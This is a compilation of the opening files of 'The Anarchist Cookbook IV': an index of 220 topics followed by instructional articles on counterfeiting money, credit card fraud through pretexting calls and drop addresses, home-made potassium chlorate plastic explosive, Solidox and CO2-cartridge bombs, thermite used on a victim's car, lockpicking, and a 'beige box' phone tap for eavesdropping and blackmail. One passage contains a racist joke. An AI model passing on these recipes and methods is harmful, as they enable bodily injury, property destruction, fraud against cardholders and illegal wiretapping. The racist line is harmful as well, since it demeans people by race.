Found (ofc legally) and compiled into one file with additions by me lol. Shoutouts to Exodus, Jolly Roger, Mentor and everyone else carin bout hackers culture these days
                                -=>Space_weed<=-

[Index to the Anarchist Cookbook IV, ver. 4.14]

COOKBOOK.IV:  Intro by Exodus

001:  Counterfeiting Money
002:  Credit Card Fraud
003:  Making Plastic Explosives from Bleach
004:  Picking Master Locks
005:  The Arts of Lockpicking I
006:  The Arts of Lockpicking II
007:  Solidox Bombs
008:  High Tech Revenge:  The Beigebox (NEW Revision 4.14)
009:  CO2 Bombs
010:  Thermite Bombs  (NEW Rivision, 4.14)
011:  Touch Explosives
012:  Letter Bombs
013:  Paint Bombs
014:  Ways to send a car to HELL
015:  Do ya hate school?  (NEW Revision, 4.14)
016:  Phone related vandalism
017:  Highway police radar jamming
018:  Smoke Bombs
019:  Mail Box Bombs
020:  Hotwiring cars
021:  Napalm
022:  Fertilizer Bomb
023:  Tennis Ball Bomb
024:  Diskette Bombs
025:  Unlisted Phone Numbers  (NEW Revision, 4.14)
026:  Fuses
027:  How to make Potassium Nitrate
028:  Exploding Lightbulbs
029:  Under water igniters
030:  Home-brew blast cannon
031:  Chemical Equivalency List
032:  Phone Taps
033:  Landmines
034:  A different kind of Molitov Cocktail
035:  Phone Systems Tutorial I
036:  Phone Systems Tutorial II
037:  Basic Alliance Teleconferencing
038:  Aqua Box Plans
039:  Hindenberg Bomb
040:  How to Kill Someone with your Bare Hands
041:  Phone Systems Tutorial III
042:  Black Box Plans
043:  The Blotto Box
044:  Blowgun
045:  Brown Box Plans
046:  Calcium Carbide Bomb
047:  More Ways to Send a Car to Hell
048:  Ripping off Change Machines  (NEW Revision, 4.14)
049:  Clear Box Plans
050:  CNA Number Listing
051:  Electronic Terrorism
052:  How to Start a Conference w/o 2600hz or M-F
053:  Dynamite
054:  Auto Exhaust Flame Thower
055:  How to Break into BBS Express
056:  Firebomb
057:  Fuse Bomb
058:  Generic Bomb
059:  Green Box Plans
060:  Portable Grenade Launcher
061:  Basic Hacking Tutorial I
062:  Basic Hacking Tutorial II
063:  Hacking DEC's
064:  Harmless Bombs
065:  Breaking into Houses  (NEW Revision, 4.14)
066:  Hypnotism
067:  Remote Informer Issue #1
068:  Jackpotting ATM Machines
069:  Jug Bomb
070:  Fun at K-Mart
071:  Mace Substitute
072:  How to Grow Marijuana
073:  Match Head Bomb
074:  Terrorizing McDonalds
075:  "Mentor's" Last Words
076:  The Myth of the 2600hz Detector
077:  Blue Box Plans  (Ye' olde Favorite)
078:  Napalm II
079:  Nitroglycerin Recipe
080:  Operation: Fuckup
081:  Stealing Calls from Payphones
082:  Pool Fun  (NEW Revision, 4.14)
083:  Free Postage
084:  Unstable Explosives
085:  Weird Drugs
086:  The Art of Carding
087:  Recognizing Credit Cards
088:  How to Get a New Identity
089:  Remote Informer Issue #2
090:  Remote Informer Issue #3
091:  Remote Informer Issue #4
092:  Remote Informer Issue #5
093:  Phreaker's Guide to Loop Lines
094:  Ma-Bell Tutorial
095:  Getting Money out of Pay Phones
096:  Computer-based PBX
097:  PC-Pursuit Port Statistics
098:  Pearl Box Plans
099:  The Phreak File
100:  Red Box Plans
101:  RemObs
102:  Scarlet Box Plans
103:  Silver Box Plans
104:  Bell Trashing
105:  Canadian WATS Phonebook
106:  Hacking TRW
107:  Hacking VAX & UNIX
108:  Verification Circuits
109:  White Box Plans
110:  The BLAST Box
111:  Dealing with the Rate & Route Operator
112:  Cellular Phone Phreaking
113:  Cheesebox Plans
114:  How to Start Your Own Conferences
115:  Gold Box Plans
116:  The History of ESS
117:  The Lunch Box
118:  Olive Box Plans
119:  The Tron Box
120:  More TRW Info
121:  "Phreaker's Phunhouse"
122:  Phrack Magazine - Vol. 3, Issue 27 (Intro to MIDNET)
123:  Phrack Magazine - Vol. 3, Issue 27 (The Making of a Hacker)
124:  Phrack Magazine - Vol. 3, Issue 28 (Network Miscellany)
125:  Phrack Magazine - Vol. 3, Issue 28 (Pearl Box Schematic)
126:  Phrack Magazine - Vol. 3, Issue 28 (Snarfing Remote Files)
127:  Phrack Magazine - Vol. 3, Issue 30 (Western Union, Telex, 
                                         TWX & Time Service)
128:  Phrack Magazine - Vol. 3, Issue 30 (Hacking & Tymnet)
129:  Phrack Magazine - Vol. 3, Issue 30 (The DECWRL Mail Gateway) 
130:  Sodium Chlorate
131:  Mercury Fulminate
132:  Improvised Black Powder
133:  Nitric Acid
134:  Dust Bomb Instructions
135:  Carbon-Tet Explosive
136:  Making Picric Acid from Aspirin
137:  Reclamation of RDX from C-4 Explosives
138:  Egg-based Gelled Flame Fuels
139:  Clothespin Switch
140:  Flexible Plate Switch
141:  Low Signature Systems (Silencers)
142:  Delay Igniter From Cigarette
143:  Nicotine
144:  Dried Seed Timer
145:  Nail Grenade
146:  Bell Glossary
147:  Phone Dial Locks -- How to Beat'em
148:  Exchange Scanning
149:  A Short History of Phreaking
150:  "Secrets of the Little Blue Box" (story)
151:  The History of British Phreaking
152:  "Bad as Shit" (story)
153:  Telenet
154:  Fucking with the Operator
155:  Phrack Magazine - Vol. 1, Issue 1 (The Phone Preak's Fry-Um Guide)
156:  International Country Code Listing
157:  Infinity Transmitter Schematic and Plans
158:  LSD
159:  Bananas
160:  Yummy Marihuana Recipes
161:  Peanuts
162:  Chemical Fire Bottle
163:  Igniter from Book Matches
164:  "Red or White Powder" Propellant
165:  Pipe Hand Grenade
166:  European Credit Card Fraud (Written by Creditman! A 
                                         Cookbook IV Recap!!)    
167:  Potassium Bomb
168:  Your Legal Rights (For adults, or some of us think we are)
169:  Juvenile Offenders' Rights
170:  Down The Road Missle
171:  Fun With ShotGunn Shells
172:  Surveillance Equipment
173:  Drip Timer
174:  Stealing
175:  Miscellaneous 
176:  Shaving cream bomb
177:  Ripping off change machines 2
178:  Lockpicking the EASY way
179:  Anarchy 'N' Explosives Prelude
180:  Anarchy 'N' Explosives Vol. 1
181:  Anarchy 'N' Explosives Vol. 2
182:  Anarchy 'N' Explosives Vol. 3
183:  Anarchy 'N' Explosives Vol. 4
184:  Anarchy 'N' Explosives Vol. 5
185:  Explosives and Propellants
186:  Lockpicking 3
187:  Chemical Equivalent List 2
188:  Nitroglycerin 2
189:  Cellulose Nitrate
190:  Starter Explosives
191:  Flash Powder
192:  Exploding Pens
193:  Revised Pipe Bombs 4.14
194:  * SAFETY *  A MUST READ!
195:  Ammonium TriIodide
196:  Sulfuric Acid / Ammonium Nitrate III
197:  Black Powder 3
198:  Nitrocellulose
199:  R.D.X. (Revised 4.14)
200:  The Black Gate BBS
201:  ANFOS
202:  Picric Acid 2
203:  Bottled Explosives
204:  Dry Ice
205:  Fuses / Ignitors / Delays
206:  Film Canister Bombs
207:  Book Bombs
208:  Phone Bombs
209:  Special Ammunition
210:  Rocketry
211:  Pipe Cannon 2
212:  Smoke Bombs 4.14
213:  Firecrackers
214:  Suppliers II
215:  Lab-Raid Checklist
216:  Misc. Anarchy
217:  LockPicking 4
218:  Misc. Anarchy II
219:  -* THERMITE 4 *- <-- The BEST rev. to 4.14
220:  Conclusion
<EOF>


     Look for the NEXT Edition of The Anarchist CookBook!!

                                                     -=> Exodus <=-Counterfeiting Money                            by JRoger

Before reading this article, it would be a very good idea to get a 
book on photo offset printing, for this is the method used in
counterfeiting US currency.  If you are familiar with this method 
of printing, counterfeiting should be a simple task for you.

Genuine currency is made by a process called "gravure", which 
involves etching a metal block.  Since etching a metal block is
impossible to do by hand, photo offset printing comes into the 
process.

Photo offset printing starts by making negatives of the currency
with a camera, and putting the negatives on a piece of masking 
material (usually orange in color).  The stripped negatives, 
commonly called "flats", are then exposed to a lithographic plate
with an arc light plate maker.  The burned plates are then 
developed with the proper developing chemical.  One at a time, 
these plates are wrapped around the plate cylinder of the press.   

The press to use should be an 11 by 14 offset, such as the AB Dick 
360.  Make 2 negatives of the portrait side of the bill, and 1 of 
the back side.  After developing them and letting them dry, take 
them to a light table.  Using opaque on one of the portrait sides, 
touch out all the green, which is the seal and the serial numbers.  
The back side does not require any retouching, because it is all 
one color.  Now, make sure all of the negatives are registered 
(lined up correctly) on the flats.  By the way, every time you 
need another serial number, shoot 1 negative of the portrait side,
cut out the serial number, and remove the old serial number from 
the flat replacing it with the new one.

Now you have all 3 flats, and each represents a different color:  
black, and 2 shades of green (the two shades of green are created 
by mixing inks).  Now you are ready to burn the plates.  Take a 
lithographic plate and etch three marks on it.  These marks must 
be 2 and 9/16 inches apart, starting on one of the short edges.  
Do the same thing to 2 more plates.  Then, take 1 of the flats and 
place it on the plate, exactly lining the short edge up with the 
edge of the plate.  Burn it, move it up to the next mark, and 
cover up the exposed area you have already burned.  Burn that, and 
do the same thing 2 more times, moving the flat up one more mark.  
Do the same process with the other 2 flats (each on a separate 
plate).  Develop all three plates.  You should now have 4 images 
on each plate with an equal space between each bill. 

The paper you will need will not match exactly, but it will do for 
most situations.  The paper to use should have a 25% rag content.
By the way, Disaperf computer paper (invisible perforation) does 
the job well.  Take the paper and load it into the press.  Be sure 
to set the air, buckle, and paper thickness right.  Start with the 
black plate (the plate without the serial numbers).  Wrap it 
around the cylinder and load black ink in.  Make sure you run more 
than you need because there will be a lot of rejects.  Then, while 
that is printing, mix the inks for the serial numbers and the back 
side.  You will need to add some white and maybe yellow to the 
serial number ink.  You also need to add black to the back side.  
Experiment until you get it right.  Now, clean the press and print 
the other side.  You will now have a bill with no green seal or 
serial numbers.  Print a few with one serial number, make another 
and repeat.  Keep doing this until you have as many different 
numbers as you want.  Then cut the bills to the exact size with a 
paper cutter.  You should have printed a large amount of money by 
now, but there is still one problem;  the paper is pure white.  To 
dye it, mix the following in a pan:  2 cups of hot water, 4 tea 
bags, and about 16 to 20 drops of green food coloring (experiment 
with this).  Dip one of the bills in and compare it to a genuine 
US bill.  Make the necessary adjustments, and dye all the bills.  
Also, it is a good idea to make them look used.  For example, 
wrinkle them, rub coffee grinds on them, etc.

As before mentioned, unless you are familiar with photo offset 
printing, most of the information in this article will be fairly 
hard to understand.  Along with getting a book on photo offset 
printing, try to see the movie "To Live and Die in LA".  It is 
about a counterfeiter, and the producer does a pretty good job of 
showing how to counterfeit.  A good book on the subject is "The 
Poor Man's James Bond".

If all of this seems too complicated to you, there is one other 
method available for counterfeiting:  The Canon color laser 
copier.  The Canon can replicate ANYTHING in vibrant color, 
including US currency.  But, once again, the main problem in 
counterfeiting is the paper used.  So, experiment, and good luck!

                                             -= Exodus =-



Credit Card Fraud:                
-----------------

For most of you out there, money is hard to come by.  Until now:

With the recent advent of plastic money (credit cards), it is 
easy to use someone else's credit card to order the items you have 
always desired in life.  The stakes are high, but the payoff is 
worth it.

Step One:  Getting the credit card information

First off, you must obtain the crucial item:  someone's credit 
card number.  The best way to get credit card numbers is to take 
the blue carbons used in a credit card transaction at your local 
department store.  These can usually be found in the garbage can 
next to the register, or for the more daring, in the garbage 
dumpster behind the store.  But, due to the large amount of credit 
card fraud, many stores have opted to use a carbonless transaction 
sheet, making things much more difficult.  This is where your 
phone comes in handy.

First, look up someone in the phone book, and obtain as much 
information as possible about them.  Then, during business hours, 
call in a very convincing voice - "Hello, this is John Doe from 
the Visa Credit Card Fraud Investigations Department.  We have 
been informed that your credit card may have been used for 
fraudulent purposes, so will you please read off the numbers 
appearing on your Visa card for verification."  Of course, use 
your imagination!  Believe it or not, many people will fall for 
this ploy and give out their credit information.

Now, assuming that you have your victim's credit card number, you 
should be able to decipher the information given.

Step Two:  Recognizing information from carbon copies

Card examples:

[American Express]
XXXX XXXXXX XXXXX
MM/Y1 THRU MM/Y2
JOE SHMOE

[American Express]
XXXX XXXXXX XXXXX
MM/Y1 THRU MM/Y2
JOE SHMOE

Explanation:
   MM/Y1 is the date the card was issued, and MM/Y2 is the
   expiration date.  The American Express Gold Card has numbers
   XXXXXX XXXXXXXX XXXXXXXX, and is covered for up to $5000.00, 
   even if the card holder is broke. 
   
[Mastercard]
5XXX XXXX XXXX XXXX
XXXX AAA DD-MM-YY MM/YY
JOE SHMOE

Explanation:
   XXXX in the second row may be asked for during the ordering
   process.  The first date is when the card was new, and the 
   second is when the card expires.  The most frequent number 
   combination used is 5424 1800 XXXX XXXX.  There are many of 
   these cards in circulation, but many of these are on wanted
   lists, so check these first.

[Visa]
4XXX XXX(X) XXX(X) XXX(X)
MM/YY    MM/YY*VISA
JOE SHMOE

Explanation:
   Visa is the most abundant card, and is accepted almost 
   everywhere.  The "*VISA" is sometimes replaced with "BWG", or
   followed with a special code.  These codes are as follows:

   [1]  MM/YY*VISA V - Preferred Card
   [2]  MM/YY*VISA CV - Classic Card
   [3]  MM/YY*VISA PV - Premier Card
   
   Preferred Cards are backed with money, and are much safer to 
   use.  Classic Cards are newer, harder to reproduce cards with
   decent backing.  Premier Cards are Classic Cards with Preferred
   coverage.  Common numbers are 4448 020 XXX XXX, 4254 5123 6000
   XXXX, and 4254 5123 8500 XXXX.  Any 4712 1250 XXXX XXXX cards
   are IBM Credit Union cards, and are risky to use, although 
   they are usually covered for large purchases.

Step Three:  Testing credit

You should now have a Visa, Mastercard, or American Express 
credit card number, with the victim's address, zip code, and phone 
number.  By the way, if you have problems getting the address, 
most phone companies offer the Address Tracking Service, which is 
a special number you call that will give you an address from a 
phone number, at a nominal charge.  Now you need to check the 
balance of credit on the credit card (to make sure you don't run 
out of money), and you must also make sure that the card isn't 
stolen.  To do this you must obtain a phone number that 
businesses use to check out credit cards during purchases.  If you 
go to a department store, watch the cashier when someone makes a 
credit card purchase.  He/she will usually call a phone number, 
give the credit information, and then give what is called a 
"Merchant Number".  These numbers are usually written down on or 
around the register.  It is easy to either find these numbers and 
copy them, or to wait until they call one in.  Watch what they 
dial and wait for the 8 digit (usually) merchant number.  Once you 
call the number, in a calm voice, read off the account number, 
merchant number, amount, and expiration date.  The credit bureau 
will tell you if it is ok, and will give you an authorization 
number.  Pretend you are writing this number down, and repeat it 
back to them to check it.  Ignore this number completely, for it 
serves no real purpose.  However, once you do this, the bank 
removes dollars equal to what you told them, because the card was 
supposedly used to make a purchase.  Sometimes you can trick the
operator by telling her the customer changed his mind and decided 
not to charge it.  Of course, some will not allow this.  Remember
at all times that you are supposed to be a store clerk calling to 
check out the card for a purchase.  Act like you are talking with 
a customer when he/she "cancels".

Step Four:  The drop

Once the cards are cleared, you must find a place to have the 
package sent.  NEVER use a drop more than once.  The following are 
typical drop sites:

   [1]  An empty house
        
An empty house makes an excellent place to send things.  Send the 
package UPS, and leave a note on the door saying, "UPS.  I work 
days, 8 to 6.  Could you please leave the package on the back door 
step?"  You can find dozens of houses from a real estate agent by 
telling them you want to look around for a house.  Ask for a list 
of twenty houses for sale, and tell them you will check out the 
area.  Do so, until you find one that suits your needs.

   [2]  Rent A Spot

U-Haul sometimes rents spaces where you can have packages sent and 
signed for.  End your space when the package arrives.

   [3]  People's houses

Find someone you do not know, and have the package sent there.  
Call ahead saying that "I called the store and they sent the 
package to the wrong address.  It was already sent, but can you 
keep it there for me?"  This is a very reliable way if you keep
calm when talking to the people.

Do NOT try post office boxes.  Most of the time, UPS will not 
deliver to a post office box, and many people have been caught in 
the past attempting to use a post office box.  Also, when you have 
determined a drop site, keep an eye on it for suspicious 
characters and cars that have not been there before.

Step Five:  Making the transaction

You should now have a reliable credit card number with all the 
necessary billing information, and a good drop site.

The best place to order from is catalogues, and mail order houses.  
It is in your best interest to place the phone call from a pay 
phone, especially if it is a 1-800 number.  Now, when you call, 
don't try to disguise your voice, thinking you will trick the 
salesperson into believing you are an adult.  These folks are 
trained to detect this, so your best bet is to order in your own 
voice.  They will ask for the following:  name, name as it appears 
on card, phone number, billing address, expiration date, method of 
shipping, and product.  Ask if they offer UPS Red shipping (next 
day arrival), because it gives them less time to research an 
order.  If you are using American Express, you might have a bit of 
a problem shipping to an address other than the billing address.  
Also, if the salesperson starts to ask questions, do NOT hang up.  
Simply talk your way out of the situation, so you won't encourage
investigation on the order.

If everything goes right, you should have the product, free of 
charge.  Insurance picks up the tab, and no one is any wiser.  Be 
careful, and try not to order anything over $500.  In some states, 
UPS requires a signature for anything over $200, not to mention 
that anything over $200 is defined as grand theft, as well as 
credit fraud.  Get caught doing this, and you will bite it for a 
couple of years.  Good luck!

First compiled in JRII..

                                                  -= Exodus =-Making Plastic Explosives from Bleach           by The Jolly Roger

Potassium chlorate is an extremely volatile explosive compound, 
and has been used in the past as the main explosive filler in 
grenades, land mines, and mortar rounds by such countries as 
France and Germany.  Common household bleach contains a small 
amount of potassium chlorate, which can be extracted by the 
procedure that follows.

First off, you must obtain:

[1]  A heat source (hot plate, stove, etc.)
[2]  A hydrometer, or battery hydrometer
[3]  A large Pyrex, or enameled steel container (to weigh 
     chemicals)
[4]  Potassium chloride (sold as a salt substitute at health and 
     nutrition stores)

Take one gallon of bleach, place it in the container, and begin 
heating it.  While this solution heats, weigh out 63 grams of 
potassium chloride and add this to the bleach being heated.  
Constantly check the solution being heated with the hydrometer, 
and boil until you get a reading of 1.3.  If using a battery 
hydrometer, boil until you read a FULL charge.

Take the solution and allow it to cool in a refrigerator until it 
is between room temperature and 0 degrees Celcius.  Filter out the 
crystals that have formed and save them.  Boil this solution again 
and cool as before.  Filter and save the crystals.

Take the crystals that have been saved, and mix them with 
distilled water in the following proportions:  56 grams per 100 
milliliters distilled water.  Heat this solution until it boils 
and allow to cool.  Filter the solution and save the crystals that 
form upon cooling.  This process of purification is called 
"fractional crystalization".  These crystals should be relatively 
pure potassium chlorate.

Powder these to the consistency of face powder, and heat gently to 
drive off all moisture.

Now, melt five parts Vaseline with five parts wax.  Dissolve this 
in white gasoline (camp stove gasoline), and pour this liquid on 
90 parts potassium chlorate (the powdered crystals from above) 
into a plastic bowl.  Knead this liquid into the potassium 
chlorate until intimately mixed.  Allow all gasoline to evaporate.

Finally, place this explosive into a cool, dry place.  Avoid 
friction, sulfur, sulfides, and phosphorous compounds.  This 
explosive is best molded to the desired shape and density of 1.3 
grams in a cube and dipped in wax until water proof.  These block 
type charges guarantee the highest detonation velocity.  Also, a 
blasting cap of at least a 3 grade must be used.

The presence of the afore mentioned compounds (sulfur, sulfides, 
etc.) results in mixtures that are or can become highly sensitive 
and will possibly decompose explosively while in storage.  You 
should never store homemade explosives, and you must use EXTREME 
caution at all times while performing the processes in this 
article. 

You may obtain a catalog of other subject of this nature by 
writing:

     Information Publishing Co.
     Box 10042
     Odessa, Texas  79762


                                                       -= Exodus =-
                                                            '94Picking Master Locks                            by The Jolly Roger

Have you ever tried to impress someone by picking one of those 
Master combination locks and failed?

The Master lock company made their older combination locks with a 
protection scheme.  If you pull the handle too hard, the knob will 
not turn.  That was their biggest mistake.

The first number:

Get out any of the Master locks so you know what is going on.  
While pulling on the clasp (part that springs open when you get 
the combination right), turn the knob to the left until it will 
not move any more, and add five to the number you reach.  You now 
have the first number of the combination.

The second number:

Spin the dial around a couple of times, then go to the first 
number you got.  Turn the dial to the right, bypassing the first 
number once.  When you have bypassed the first number, start 
pulling on the clasp and turning the knob.  The knob will 
eventually fall into the groove and lock.  While in the groove, 
pull the clasp and turn the knob.  If the knob is loose, go to the 
next groove, if the knob is stiff, you have the second number of 
the combination.

The third number:

After getting the second number, spin the dial, then enter the two 
numbers.  Slowly spin the dial to the right, and at each number, 
pull on the clasp.  The lock will eventually open if you did the 
process right.  

This method of opening Master locks only works on older models.  
Someone informed Master of their mistake, and they employed a new 
mechanism that is foolproof (for now).

The older models are from 1988-1990.  The newer models are being
cracked on as we speak..

                                                 -= Exodus =-
                                                       '94
The Arts of Lockpicking II             courtesy of The Jolly Roger

So you want to be a criminal.  Well, if you want to be like James 
Bond and open a lock in fifteen seconds, then go to Hollywood, 
because that is the only place you are ever going to do it.  Even 
experienced locksmiths can spend five to ten minutes on a lock if
they are unlucky.  If you are wanting extremely quick access, look
elsewhere.  The following instructions will pertain mostly to the
"lock in knob" type lock, since it is the easiest to pick.

First of all, you need a pick set.  If you know a locksmith, get 
him to make you a set.  This will be the best possible set for you
to use.  If you find a locksmith unwilling to supply a set, don't 
give up hope.  It is possible to make your own, if you have access
to a grinder (you can use a file, but it takes forever).

The thing you need is an allen wrench set (very small).  These 
should be small enough to fit into the keyhole slot.  Now, bend 
the long end of the allen wrench at a slight angle (not 90  
degrees).  Now, take your pick to a grinder or a file, and smooth 
the end until it is rounded so it won't hang inside the lock.  
Test your tool out on doorknobs at your house to see if it will 
slide in and out smoothly.  Now, this is where the screwdriver 
comes in.  It must be small enough for it and your pick to be used
in the same lock at the same time, one above the other.  In the 
coming instructions, please refer to this chart of the interior of
a lock:
______________________________
                              \ K
        |  |  |  |   |   |    / E
           |     |   |   |    \ Y           [|]  Upper tumbler pin
        ^     ^               / H           [^]  Lower tumbler pin
        ^  ^  ^  ^   ^   ^    \ O           [-]  Cylinder wall
                              / L   (This is a greatly simplified
                              \ E    drawing)
______________________________/

The object is to press the pin up so that the space between the 
upper pin and the lower pin is level with the cylinder wall.  Now,
if you push a pin up, it's tendency is to fall back down, right?
That is where the screwdriver comes in.  Insert the screwdriver 
into the slot and turn.  This tension will keep the "solved" pins
from falling back down.  Now, work from the back of the lock to 
the front, and when you are through, there will be a click, the
screwdriver will turn freely, and the door will open.

Do not get discouraged on your first try!  It will probably take 
you about twenty to thirty minutes your first time.  After that,
you will quickly improve with practice.

Add to TACIV, '94.

                                  -= Exodus =-Solidox Bombs                                   by The Jolly Roger

Most people are not aware that a volatile, extremely explosive 
chemical can be bought over the counter:  Solidox.

Solidox comes in an aluminum can containing 6 grey sticks, and can 
be bought at Kmart, and various hardware supply shops for around 
$7.00.  Solidox is used in welding applications as an oxidizing 
agent for the hot flame needed to melt metal.  The most active 
ingredient in Solidox is potassium chlorate, a filler used in many 
military applications in the WWII era.

Since Solidox is literally what the name says:  SOLID OXygen, you 
must have an energy source for an explosion.  The most common and 
readily available energy source is common household sugar, or 
sucrose.  In theory, glucose would be the purest energy source, 
but it is hard to find a solid supply of glucose.

Making the mixture:

[1]  Open the can of Solidox, and remove all 6 sticks.  One by 
     one, grind up each of the sticks (preferably with a mortar 
     and pestle) into the finest powder possible.
[2]  The ratio for mixing the sugar with the Solidox is 1:1, so 
     weigh the Solidox powder, and grind up the equivalent amount 
     of sugar.
[3]  Mix equivalent amounts of Solidox powder, and sugar in a 1:1 
     ratio.

It is just that simple!  You now have an extremely powerful 
substance that can be used in a variety of applications.  A word 
of caution:  be EXTREMELY careful in the entire process.  Avoid 
friction, heat, and flame.  A few years back, a teenager I knew 
blew 4 fingers off while trying to make a pipe bomb with Solidox.  
You have been warned!


SolidOx can no longer be bought in KMart.  A plumbing and heating supply
store, or even Sears may have small quantities for sale, at about
$18.00 for 10 stix.

                                                  ---Exodus
High Tech Revenge: The Beigebox  rev. 4.14          by -= Exodus =-
   
             -------------Introduction-------------
Have you ever wanted a lineman's handset? Surely every phreak has at
least once considered the phun that he could have with one. After searching
unlocked phone company trucks for months, we had an idea. We could build
one. We did, and named it the "Beige Box" simply because that is the color
of ours. 
The beigebox is simply a consumer lineman's handset, which is a 
phone that can be attached to the outside of a person's house.  To 
fabricate a beigebox, follow along.

             ---------Construction and Use---------
The construction is very simple. First you must understand the concept of
the device. In a modular jack, there are four wires. These are red, green,
yellow, and black. For a single line telephone, however, only two matter:
the red (ring) and green (tip). The yellow and the black are not neccessary
for this project. A lineman's handset has two clips on it: the ring and
the tip. Take a modular jack and look at the bottom of it's casing. There
should be a grey jack with four wires  (red, green, yellow & black)
leading out of it. To the end of the red wire attach a red aligator clip.
To the end of the green wire attatch a green aligator clip. The yellow
and black wires can be removed, although I would only set them aside so
that you can use the modular jack in future projects. Now insert your
telephone's modular plug into the modular jack. That's it. This particular
model is nice because it is can be easily made, is inexpensive, uses
common parts that are readily available, is small, is lightweight,
and does not require the destruction of a phone.

             ------------Beige Box Uses------------
There are many uses for a Beige Box. However, before you can use it,
you must know how to attach it to the output device. This device can be
of any of Bell switching apparatus that include germinal sets (i.e.
remote switching centers, bridgin heads, cans, etc.). To open most Bell
Telephone switching apparatus, you must have a 7/16 inch hex driver
(or a good pair of needle nose pliers work also).
This piece of equipment can be picked up at your local hardware store.
With your hex driver (or pliers), turn the security bolt(s) approximately
1/8 of an inch counter-clockwise and open. If your output device is locked,
then you must have some knowledge of destroying and/or picking locks.
However, we have never encountered a locked output device. Once you have
opened your output device, you should see a mass of wires connected to
terminals. On most output devices, the terminals should be labeled "T"
(Tip -- if not labeled, it is usually on the left) and "R" (Ring -- if
not labeled, usually on the right).

Remember: Ring - red - right. The "Three R's" -- a simple way to
remember which is which. Now you must attach all the red alligator clip
(Ring) to the "R" (Ring) terminal.
Attach the green alligator clip (Tip) to the "T" (Tip) terminal.

Note: If instead of a dial tone you hear nothing, adjust the alligator
clips so that they are not touching each other terminals. Also make sure
they are firmly attached. By this time you should hear a dial tone.
Dial ANI to find out the number you are using (you wouldn't want to use
your own). Here are some practicle aplications:

       > Eavesdropping
       > Long distance, static free free fone calls to phriends
       > Dialing direct to Alliance Teleconferencing (also no static)
       > Phucking people over
       > Bothering the operator at little risk to yourself
       > Blue Boxing with greatly reduced chance of getting caught
       > Anything at all you want, since you are on an extension of that line.

Eavesdropping
-------------
To be most effective, first attach the Beige Box then your phone. This
eliminates the static caused by connecting the box, therefore
reducing the potential suspicion of your victim. When eavesdropping,
it is allways best to be neither seen nor heard. If you hear someone
dialing out, do not panic; but rather hang up, wait, and pick up the
receiver again. The person will either have hung up or tried to complete
their call again. If the latter is true, then listen in, and perhaps you
will find information worthy of blackmail! If you would like to know who
you are listening to, after dialing ANI, pull a CN/A on the number.

Dialing Long Distance
---------------------
This section is self explanitory, but don't forget to dial a "1" before
the NPA.

Dialing Direct to Aliance Teleconferencing
------------------------------------------
Simply dial 0-700-456-1000 and you will get instructions from there.
I prefer this method over PBX's, since PBX's often have poor reception
and are more dificult to come by.

Phucking People Over
--------------------
This is a very large topic of discussion. Just by using the other topics
described, you can create a large phone bill for the person (they will
not have to pay for it, but it will be a big hassle for them). In addition,
since you are an extension of the person's line, you can leave your
phone off the hook, and they will not be able to make or receive calls.
This can be extremely nasty because no one would expect the cause
of the problem. 
Bothering the Operator
----------------------
This is also self explanitary and can provide hours of entertainment.
Simply ask her things that are offensive or you would not like traced
to your line. This also corresponds to the previously described section,
Phucking People Over. After all, guess who's line it gets traced to?
He he he...

Blue Boxing
-----------
See a file on Blue Boxing for more details. This is an especially nice
feature if you live in an ESS-equiped prefix, since the calls are, once
again, not traced to your line...

---POTENTIAL RISKS OF BEIGE BOXING----
Overuse of the Beige Box may cause suspicians within the Gestapo,
and result in legal problems. Therefor, I would recomend you:

            > Choose a secluded spot to do your Beige Boxing,
            > Use more than one output device
            > Keep a low profile (i.e., do not post under your real
              name on a public BBS concering your occomplishments)
            > In order to make sure the enemy has not been inside your output
              device, I recomend you place a piece of transparent tape over
              the opening of your output device. Therefor, if it is
              opened in your abscence, the tapqe will be displaced and
              you will be aware of the fact that someone has intruded
              on your teritory.

Now, imagine the possibilities:  a $2000 dollar phone bill for 
that special person, 976 numbers galore, even harassing the 
operator at no risk to you!  Think of it as walking into an 
enemies house, and using their phone to your heart's content.



                                     Exodus


               How to make a CO2 bomb        by the Jolly Roger

You will have to use up the cartridge first by either shooting it 
or whatever. With a nail, force a hole bigger so as to allow the 
powder and wick to fit in easily. Fill the cartridge with black 
powder and pack it in there real good by tapping the bottom of the 
cartridge on a hard surface (I said TAP not SLAM!). Insert a fuse. 
I recommend a good water-proof cannon fuse, or an m-80 type fuse, 
but firecracker fuses work, if you can run like a black man runs 
from the cops after raping a white girl.) Now, light it and run 
like hell! It does wonders for a row of mailboxes (like the ones 
in apartment complexes), a car (place under the gas tank), a 
picture window (place on window sill), a phone booth (place right 
under the phone), or any other devious place. This thing throws 
shrapnel, and can make quit a mess!!  -Jolly Roger-



Thermite II... or A better way to make Thermite        by Jolly Roger

Thermite is nasty shit. Here is a good and easy way to make it. 
The first step is to get some iron-oxide (which is RUST!). Here is 
a good way to make large quantities in a short time:

- Get a DC convertor like the one used on a train set. Cut the 
connector off, seperate the wires, and strip them both.

- Now you need a jar of water with a tablespoon or so of sodium 
chloride (which is SALT!) added to it. This makes the water 
conductive.

- Now insert both wires into the mixture (I am assuming you 
plugged the convertor in...) and let them sit for five minutes. 
One of them will start bubbling more than the other. This is the 
POSITIVE(+) wire. If you do not do this test right, the final 
product will be the opposite (chemically) of rust, which is RUST 
ACID. You have no use for this here (although it IS useful!).

- Anyway, put the nail tied to the positive wire into the jar. Now 
put the negative wire in the other end. Now let it sit overnight 
and in the morning scrape the rust off of the nail & repeat until 
you got a bunch of rust on the bottom of the glass. Be generous 
with your rust collection. If you are going through the trouble of 
making thermite, you might as well make a lot, right?

- Now remove the excess water and pour the crusty solution onto a 
cookie sheet. Dry it in the sun for a few hours, or inside 
overnight. It should be an orange-brown color (although I have 
seen it in many different colors! Sometimes the color gets fucked 
up, what can I say... but it is still iron oxide!)

- Crush the rust into a fine powder and heat it in a cast-iron pot 
until it is red. Now mix the pure iron oxide with pure alluminum 
filinos which can be bought or filed down by hand from an aluminum 
tube or bar. The ratio or iron oxide to aluminum is 8 grams to 3 
grams.

- Congrats! You have just made THERMITE! Now, to light it...

- Thermite requires a LOT of heat (more than a blow torch!) to 
ignite. However, a magnesium ribbon (which is sorta hard to find.. 
call around) will do the trick.  It takes the heat from the 
burning magnesium to light the thermite.

- Now when you see your victim's car, pour a fifty-cent sized pile 
onto his hood, stick the ribbon in it, and light the ribbon with 
the blow torch. Now chuckle as you watch it burn through the hood, 
the block, the axle, and the pavement. BE CAREFUL! The ideal 
mixtures can vaporize CARBON STEEL! Another idea is to use 
thermite to get into pay phone cash boxes. HAVE FUN!! 

See file 219.txt for Thermite IV, the BEST way to make Thermite..

                                                 -= Exodus =-


